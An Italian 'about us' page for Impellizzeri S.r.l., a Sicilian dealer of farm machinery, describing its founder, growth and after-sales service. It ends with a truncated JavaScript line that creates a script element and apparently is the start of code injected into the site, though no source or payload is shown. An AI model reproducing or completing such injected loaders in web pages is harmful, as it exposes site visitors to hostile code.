Impellizzeri S.r.l., esclusivista nelle province di Trapani e Palermo di numerosi marchi di prestigio, opera in tutta la Sicilia commercializzando mezzi agricoli, mieti – trebbie e un’ampia gamma di attrezzature per la gestione, la lavorazione, la semina, la fienagione, il trasporto e la movimentazione dei prodotti agricoli.

L’azienda trae origine dall’iniziativa imprenditoriale intrapresa circa trenta anni fa dal suo fondatore, nonché odierno amministratore, Giuseppe Impellizzeri, uno dei pochi self-made-man della provincia di Trapani.

L’azienda oggi rappresenta una delle realtà imprenditoriali più importanti del settore nel Meridione d’Italia registrando dei tassi di crescita annui di tutto rispetto e mantenendo la sua posizione di leadership in un mercato globale ed internazionale.

I prodotti di alta qualità, gli investimenti nelle tecnologie informatiche, l’adeguamento dei servizi delle strutture commerciali e di customer care, la cura dell’immagine aziendale e del marketing associata ad una consolidata capacità finanziaria sono il sale del successo di Impellizzeri S.r.l.

Un asset fondamentale che contraddistingue l’azienda è il servizio post vendita offerto alla clientela e la vastissima gamma di prodotti di nicchia e specialistici in grado di soddisfare ogni esigenza produttiva di un’agricoltura al passo con i tempi e sempre più tecnologicamente avanzata.

Gallery

var d=document;var s=d.createElement('script');